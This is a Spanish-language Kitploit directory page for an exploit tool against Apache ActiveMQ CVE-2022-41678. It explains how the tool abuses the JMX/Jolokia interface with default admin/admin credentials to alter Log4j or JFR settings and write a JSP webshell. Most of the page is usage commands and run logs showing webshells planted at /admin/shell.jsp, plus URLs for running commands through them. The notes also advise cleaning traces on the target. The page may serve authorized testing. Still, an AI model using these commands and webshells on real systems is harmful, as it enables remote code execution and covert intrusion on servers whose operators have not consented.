Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2022-41678 — CVE-2022-41678 es una vulnerabilidad de ejecución remota de código en Apache ActiveMQ. Esta vulnerabilidad permite a un atacante modificar la configuración de Log4j o la configuración de JFR (Java Flight Recorder) a través de la interfaz JMX (Java Management Extensions), escribiendo así un webshell JSP malicioso en el directorio web del servidor, logrando en última instancia la ejecución remota de código. | Kitploit
Herramientas/GitHubGitHub/urjack2025/cve-2022-41678
Generación de PayloadsAnálisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebPruebas de PenetraciónHerramienta de Acceso Remoto
GitHuburjack2025/cve-2022-41678

CVE-2022-41678

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Ver Repositorio
22hace 11 mesesAún no revisado

Acerca de

CVE-2022-41678 es una vulnerabilidad de ejecución remota de código en Apache ActiveMQ. Esta vulnerabilidad permite a un atacante modificar la configuración de Log4j o la configuración de JFR (Java Flight Recorder) a través de la interfaz JMX (Java Management Extensions), escribiendo así un webshell JSP malicioso en el directorio web del servidor, logrando en última instancia la ejecución remota de código.

Compartir

Herramienta de explotación de Apache ActiveMQ CVE-2022-41678

Descripción de la vulnerabilidad

Documento de referencia: https://app.nextcyber.cn/courses/41/tasks/580

CVE-2022-41678 es una vulnerabilidad de ejecución remota de código en Apache ActiveMQ. Esta vulnerabilidad permite a un atacante modificar la configuración de Log4j o la configuración de JFR (Java Flight Recorder) a través de la interfaz JMX (Java Management Extensions), escribiendo así un webshell JSP malicioso en el directorio web del servidor y logrando finalmente la ejecución remota de código.

Esta vulnerabilidad afecta a múltiples versiones de Apache ActiveMQ; las versiones concretas afectadas dependen del uso de las configuraciones de Log4j y JFR.

Requisitos del entorno

  • Python 3.6 o superior
  • Instalar las dependencias necesarias:
    root@kitploit:~
    pip install requests
    
  • El servidor ActiveMQ objetivo debe tener habilitada la interfaz JMX (normalmente accesible a través de la ruta /api/jolokia/)
  • El atacante necesita conocer el nombre de usuario y la contraseña de la consola de ActiveMQ (por defecto suele ser admin/admin)

Uso

Uso básico

Utilizando las credenciales predeterminadas admin/admin y el método de explotación detectado automáticamente:

root@kitploit:~
python exp.py http://target:8161

También se puede especificar el nombre de usuario y la contraseña mediante los parámetros -u y -p:

root@kitploit:~
# 使用 Log4j
python exp.py -u admin -p admin http://10.22.174.214:8161

# 执行结果如下
python exp.py -u admin -p admin http://10.22.174.214:8161
2025-10-14 22:53:54,115 - INFO - choice MBean 'org.apache.logging.log4j2:type=5faeada1' automatically
2025-10-14 22:53:54,334 - INFO - update log config
2025-10-14 22:53:54,467 - INFO - write webshell to http://10.22.174.214:8161/admin/shell.jsp?cmd=id
2025-10-14 22:53:54,655 - INFO - restore log config

Además del método de explotación Log4j utilizado por defecto, también se puede especificar el método JFR mediante el parámetro --exploit jfr.

root@kitploit:~
# 使用 JFR 方式
python exp.py -u admin -p admin --exploit jfr http://10.22.174.214:8161

# 执行结果如下
python exp.py -u admin -p admin --exploit jfr http://10.22.174.214:8161/
2025-10-14 23:16:35,978 - INFO - choice MBean jdk.management.jfr:type=FlightRecorder manually
2025-10-14 23:16:37,390 - INFO - create flight record, id = 1
2025-10-14 23:16:37,533 - INFO - update configuration for record 1
2025-10-14 23:16:38,167 - INFO - start record
2025-10-14 23:16:39,243 - INFO - stop record
2025-10-14 23:16:39,309 - INFO - write webshell to http://10.22.174.214:8161/admin/shelljfr.jsp?cmd=id

Verificar el resultado de la explotación

Tras una explotación exitosa, se pueden ejecutar comandos accediendo a las siguientes URL:

root@kitploit:~
# Log4j 方式写入的 webshell
http://target:8161/admin/shell.jsp?cmd=命令

# JFR 方式写入的 webshell
http://target:8161/admin/shelljfr.jsp?cmd=命令

Por ejemplo, para ejecutar el comando id:

root@kitploit:~
http://target:8161/admin/shell.jsp?cmd=id

Descripción de los parámetros de la herramienta

ParámetroAbreviaturaTipoValor por defectoDescripción
--username-uCadenaadminNombre de usuario de la consola de ActiveMQ
--password-pCadenaadminContraseña de la consola de ActiveMQ
--exploit-eCadenaautoMétodo de explotación, valores posibles: auto, log4j, jfr
url-Cadena-URL del ActiveMQ objetivo (parámetro obligatorio)

Notas

  1. Esta herramienta está destinada únicamente a la investigación de seguridad y a pruebas autorizadas; no la utilice en sistemas no autorizados.
  2. Tras una explotación exitosa, la herramienta intenta restaurar la configuración original de Log4j para minimizar el impacto en el sistema objetivo.
  3. Si el sistema objetivo tiene restricciones de acceso de red, es posible que deba ajustar la configuración de red para asegurar el acceso a la interfaz JMX del objetivo.
  4. Las diferentes versiones de ActiveMQ pueden tener distintas rutas y configuraciones; es posible que deba ajustar las rutas en la herramienta según la situación real.
  5. La herramienta opera a través de la interfaz JMX; debe asegurarse de que el ActiveMQ objetivo tenga habilitada esta interfaz.
  6. La ejecución de esta herramienta puede dejar registros en el sistema objetivo; asegúrese de limpiar los rastros correspondientes.
Descargar herramienta